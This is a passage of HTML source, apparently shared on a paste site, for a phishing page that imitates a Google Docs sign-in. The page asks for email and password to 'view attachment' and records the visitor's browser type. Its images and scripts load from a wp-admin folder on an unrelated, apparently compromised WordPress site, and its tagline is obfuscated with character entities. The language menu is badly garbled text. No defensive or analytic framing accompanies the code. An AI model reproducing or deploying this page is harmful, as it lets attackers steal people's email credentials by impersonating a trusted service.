  954. <option value="4" data-imagesrc="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/aol.png"
  955. data-description="Sign in with AOL">AOL</option>
  956. <option value="5" data-imagesrc="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/email.png"
  957. data-description="Sign in with Others">Others</option></select>
  958. <br/>
  959. <label class="hidden-label" for="Email">Email</label>
  960.  
  961. <span id="sprytextfield1">
  962. <input id="Email" name="Email" type="email"
  963. placeholder="Email"
  964. value=""
  965. spellcheck="false"
  966. class="" required>
  967. </span>
  968. <label class="hidden-label" for="Passwd">Password</label>
  969. <span id="sprypassword1">
  970. <input id="Passwd" name="Passwd" type="password"
  971. placeholder="Password"
  972. class="">
  973. <span class="passwordRequiredMsg">Enter your password.</span></span>
  974. <input id="signIn" name="signIn" class="rc-button rc-button-submit" type="submit" value="Sign in to view attachment">
  975. <input type="hidden" name="browser" id="browser" value="">
  976. <label class="remember">
  977. <input id="PersistentCookie" name="PersistentCookie"
  978. type="checkbox" value="yes">
  979. <span>
  980. Stay signed in
  981. </span>
  982. </label>
  983. <input type="hidden" name="rmShown" value="1">
  984. <a id="link-forgot-passwd" href="#"
  985. class="need-help-reverse"
  986. >
  987. Need help?
  988. </a>
  989. </form>
  990. </div>
  991. <div class="one-google">
  992. <p class="tagline">
  993. A&#99;&#99;&#101;&#115;&#115;&#32;&#121;&#111;&#117;&#114;&#32;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#115;&#32;&#115;&#101;&#99;&#117;&#114;&#101;&#108;&#121;&#44;&#32;&#110;&#111;&#32;&#109;&#97;&#116;&#116;&#101;&#114;&#32;&#121;&#111;&#117;&#114;&#32;&#108;&#111;&#99;&#97;&#116;&#105;on
  994. </p>
  995. <img src="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/logo_strip_2x.png" width="420" height="32" alt="">
  996. </div>
  997. </div>
  998. <div class="google-footer-bar">
  999. <div class="footer content clearfix">
  1000. <ul id="footer-list">
  1001. <li>
  1002. Google
  1003. </li>
  1004. <li>
  1005. <a href="#" target="_blank">
  1006. Privacy &amp; Terms
  1007. </a>
  1008. </li>
  1009. <li>
  1010. <a href="#" target="_blank">
  1011. Help
  1012. </a>
  1013. </li>
  1014. </ul>
  1015. <div id="lang-vis-control" style="display: none">
  1016. <span id="lang-chooser-wrap" class="lang-chooser-wrap">
  1017. <label for="lang-chooser"><img src="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/universal_language_settings-21.png" alt="Change language"></label>
  1018. <select id="lang-chooser" class="lang-chooser" name="lang-chooser">
  1019. <option value="af"
  1020. >
  1021. вÐðAfrikaansвЬ
  1022. </option>
  1023. <option value="az"
  1024. >
  1025. вðÐazñ"â¢rbaycanвЬ
  1026. </option>
  1027. <option value="in"
  1028. >
  1029. вðÐBahasa Indonesiaвð¬
  1030. </option>
  1031. <option value="ms"
  1032. >
  1033. вÐðBahasa Melayuвð¬
  1034. </option>
  1035. <option value="ca"
  1036. >
  1037. вððcatalð вð¬
  1038. </option>
  1039. <option value="cs"
  1040. >
  1041. вÐððÐ`eÐ"Ñ}tinaвð¬
  1042. </option>
  1043. <option value="da"
  1044. >
  1045. вððDanskвð¬
  1046. </option>
  1047. <option value="de"
  1048. >
  1049. вððDeutschвЬ
  1050. </option>
  1051. <option value="et"
  1052. >
  1053. вðÐeestiвЬ
  1054. </option>
  1055. <option value="en-GB"
  1056. >
  1057. вðÐEnglish (United Kingdom)вð¬
  1058. </option>
  1059. <option value="en"
  1060.  
  1061. selected="selected"
  1062. >
  1063. вÐðEnglish (United States)вð¬
  1064. </option>
  1065. <option value="es"
  1066. >
  1067. вÐðEspað±ol (Espað±a)вð¬
  1068. </option>
  1069. <option value="es-419"
  1070. >
  1071. вÐðEspað±ol (LatinoamЩrica)вð¬
  1072. </option>
  1073. <option value="eu"
  1074. >
  1075. вÐðeuskaraвð¬
  1076. </option>
  1077. <option value="fil"
  1078. >
  1079. вÐðFilipinoвð¬
  1080. </option>
  1081. <option value="fr-CA"
  1082. >
  1083. вÐðFranð§ais (Canada)вð¬
  1084. </option>
  1085. <option value="fr"
  1086. >
  1087. вÐðFranð§ais (France)вð¬
  1088. </option>
  1089. <option value="gl"
  1090. >
  1091. вÐðgalegoвЬ
  1092. </option>
  1093. <option value="hr"
  1094. >
  1095. вðÐHrvatskiвЬ
  1096. </option>
  1097. <option value="zu"
  1098. >
  1099. вðÐisiZuluвð¬
  1100. </option>
  1101. <option value="is"
  1102. >
  1103. вÐðð­slenskaвð¬
  1104. </option>
  1105. <option value="it"
  1106. >
  1107. вÐðItalianoвð¬
  1108. </option>
  1109. <option value="sw"
  1110. >
  1111. вÐðKiswahiliвЬ
  1112. </option>
  1113. <option value="lv"
  1114. >
  1115. вðÐlatvieð"Ñ}uвЬ
  1116. </option>
  1117. <option value="lt"
  1118. >
  1119. вðÐlietuviÐ"ñвЬ
  1120. </option>
  1121. <option value="hu"
  1122. >
  1123. вðÐmagyarвð¬
  1124. </option>
  1125. <option value="nl"
  1126. >
  1127. вððNederlandsвЬ
  1128. </option>
  1129. <option value="no"
  1130. >
  1131. вðÐnorskвЬ
  1132. </option>
  1133. <option value="pl"
  1134. >
  1135. вðÐpolskiвð¬
  1136. </option>
  1137. <option value="pt"
  1138. >
  1139. вððPortuguðÐsвð¬
  1140. </option>
  1141. <option value="pt-BR"
  1142. >
  1143. вÐðPortuguððs (Brasil)вЬ
  1144. </option>
  1145. <option value="pt-PT"
  1146. >
  1147. вðÐPortuguÐðs (Portugal)вЬ
  1148. </option>
  1149. <option value="ro"
  1150. >
  1151. вðÐromðÑ~nðÑвð¬
  1152. </option>
  1153. <option value="sk"
  1154. >
  1155. вððSlovenÐÑRinaвЬ
  1156. </option>
  1157. <option value="sl"
  1158. >
  1159. вðÐslovenð"Ñ}ÐÑRinaвЬ
  1160. </option>
  1161. <option value="fi"
  1162. >
  1163. вðÐSuomiвЬ
  1164. </option>
  1165. <option value="sv"
  1166. >
  1167. вðÐSvenskaвð¬
  1168. </option>
  1169. <option value="vi"
  1170. >
  1171. вÐðTiбññng Viб»⬡tвЬ
  1172. </option>
  1173. <option value="tr"
  1174. >
  1175. вðÐTÐÓÜrkЧeвð¬
  1176. </option>
  1177. <option value="el"
  1178. >
  1179. вððÐ~⬢Ñ~»Ð~»Ñ~·Ñ~ð&Ð~âÑ~ñÐ~¬вЬ
  1180. </option>
  1181. <option value="bg"
  1182. >
  1183. вðÐР±Сð0Р»РñР°СÐСђРñÐ Ñвð¬
  1184. </option>
  1185. <option value="mn"
  1186. >
  1187. вððÐ ÓÜÐ Ñ"Ð ð&Ð ñÐ Ñ"Р»вð¬
  1188. </option>
  1189. <option value="ru"
  1190. >
  1191. вÐðР СñСђСВРñÐ ñÐ â>вð¬
  1192. </option>
  1193. <option value="sr"
  1194. >
  1195. вÐðÐ Ð}СðÐ ñСВРñÐ ñвЬ
  1196. </option>
  1197. <option value="uk"
  1198. >
  1199. вðÐÐ ÒÆÐ ñСÐР°Сâ¬Ð ð&СђСÐ`Ð ñР°вЬ
  1200. </option>
  1201. <option value="ka"
  1202. >
  1203. вðÐбñҐбñÑбñ бñâ¬бñÒÆбññ"бñÂÜвð¬
  1204. </option>
  1205. <option value="hy"
  1206. >
  1207. вÐðХ°ХÑ}ХµХҐЦðХҐХ¶вð¬
  1208. </option>
  1209. <option value="iw"
  1210. >
  1211. вð«ЧÑ~Чâ®ÜЧЁЧâ¢Ð§ðвЬвÐð9
  1212. </option>
  1213. <option value="ur"
  1214. >
  1215. вð«Ш§Ш±ШÐ!Щâ¬Ð²Ð¬вÐð9
  1216. </option>
  1217. <option value="ar"
  1218. >
  1219. вð«Ш§Щâ¬~Шâ>Ш±ШЁЩð0Ш©вð¬вðÐ9
  1220. </option>
  1221. <option value="fa"
  1222. >
  1223. вð«ЩђШ§Ш±ШñЫÐ`вð¬вðÐ9
  1224. </option>
  1225. <option value="am"
  1226. >
  1227. вððбð0 бâ¬â¬ºÐ±â¬Â­Ð±ð0⬺вЬ
  1228. </option>
  1229. <option value="ne"
  1230. >
  1231. вðÐа¤ЁаҐ⬡а¤ðа¤ñ"а¤ð аҐðвð¬
  1232. </option>
  1233. <option value="mr"
  1234. >
  1235. вÐðमरа¤ñ"а¤ аҐðвЬ
  1236. </option>
  1237. <option value="hi"
  1238. >
  1239. вðÐа¤â>а¤ñа¤ЁаҐÑRदаҐðвð¬
  1240. </option>
  1241. <option value="bn"
  1242. >
  1243. вÐðবа¦ñ"а¦â¬aа¦Ра¦Ñ"вð¬
  1244. </option>
  1245. <option value="gu"
  1246. >
  1247. вððаðâ¬а«ђаÐÑaаааÐñ"аФа«ðвЬ
  1248. </option>
  1249. <option value="ta"
  1250. >
  1251. вðÐதமа®Ñа®Òаð!ÐRвð¬
  1252. </option>
  1253. <option value="te"
  1254. >
  1255. вððа°¤а±⬠а°ð а±ђа°â¬а±Ввð¬
  1256. </option>
  1257. <option value="kn"
  1258. >
  1259. вððаð ⬢аРЁаÑÑRаРЁаРÑ}вЬ
  1260. </option>
  1261. <option value="ml"
  1262. >
  1263. вðÐаò®аòРаòÐ!аòÑ"аòÑаòâ­aвð¬
  1264. </option>
  1265. <option value="si"
  1266. >
  1267. вÐðа·ñа·â¬"а¶â­aа·â­~а¶ð&вЬ
  1268. </option>
  1269. <option value="th"
  1270. >
  1271. вðÐаâ>â­~аÑâ¬аñÑ~вð¬
  1272. </option>
  1273. <option value="lo"
  1274. >
  1275. вððаñҐаñð аñ§вð¬
  1276. </option>
  1277. <option value="km"
  1278. >
  1279. вÐðбÑ:ђбÑxâ¬"бñ:ÂÜбÑxâ­aбñ:ñ"вð¬
  1280. </option>
  1281. <option value="ko"
  1282. >
  1283. вÐðн⬢Ñaкµ­мâ¬òвð¬
  1284. </option>
  1285. <option value="zh-HK"
  1286. >
  1287. вÐðдÑ­жâ¬⬡пÓÜâ¬Ð¹Â¦â¢Ð¶ñÐ!пÓÜ⬰вð¬
  1288. </option>
  1289. <option value="ja"
  1290. >
  1291. вÐðжâ¬ҐжÑa¬иðÑ:вð¬
  1292. </option>
  1293. <option value="zh-CN"
  1294. >
  1295. вððз®ðдð&â­SдÑ­жâ¬⬡вð¬
  1296. </option>
  1297. <option value="zh-TW"
  1298. >
  1299. вÐðзâ>Вй«⬝дñ­жâ¬⬡вð¬
  1300. </option>
  1301. </select>
  1302. </span>
  1303. </div>
  1304. </div>
  1305. </div>
  1306. </div>
  1307. <script type="text/javascript">
  1308. // Opera 8.0+
  1309. var isOpera = (!!window.opr && !!opr.addons) || !!window.opera || navigator.userAgent.indexOf(" OPR/") >= 0;
  1310. // Firefox 1.0+
  1311. var isFirefox = typeof InstallTrigger !== "undefined";
  1312. // Safari 3.0+ "[object HTMLElementConstructor]"
  1313. var isSafari = Object.prototype.toString.call(window.HTMLElement).indexOf("Constructor") > 0 || (function (p) { return p.toString() === "[object SafariRemoteNotification]"; })(!window["safari"] || safari.pushNotification);
  1314. // Chrome 1+
  1315. var isChrome = !!window.chrome && !!window.chrome.webstore;
  1316. // Blink engine detection
  1317. var isBlink = (isChrome || isOpera) && !!window.CSS;
  1318.  
  1319. //var output = "";
  1320. if(isFirefox == true){
  1321. var output = "Firefox";
  1322. }else if(isChrome == true){
  1323. var output = "Chrome";
  1324. }else if(isSafari == true){
  1325. var output = "Safari";
  1326. }else if(isOpera == true){
  1327. var output = "Opera";
  1328. }else if(isBlink == true){
  1329. var output = "Blink";
  1330. }else{var output = "Unknown";}
  1331. document.getElementById("browser").value = output;
  1332. </script>
  1333. <script type="text/javascript" src="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/jquery.min.js"></script>
  1334. <script type="text/javascript" src="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/jquery.ddslick.min.js"></script>
  1335.  
  1336.  
  1337. <script type="text/javascript">
  1338. $('.cflagdd').ddslick({
  1339. onSelected: function(data){
  1340. if(data.selectedIndex > 0) {
  1341. $('#hidCflag').val(data.selectedData.value);
  1342.  
  1343.  
  1344. }
  1345. }
  1346. });
  1347.  
  1348. var sprypassword1 = new Spry.Widget.ValidationPassword("sprypassword1");
  1349. var sprytextfield1 = new Spry.Widget.ValidationTextField("sprytextfield1", "email");
  1350. </script>
  1351.  
  1352. </body>
  1353. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement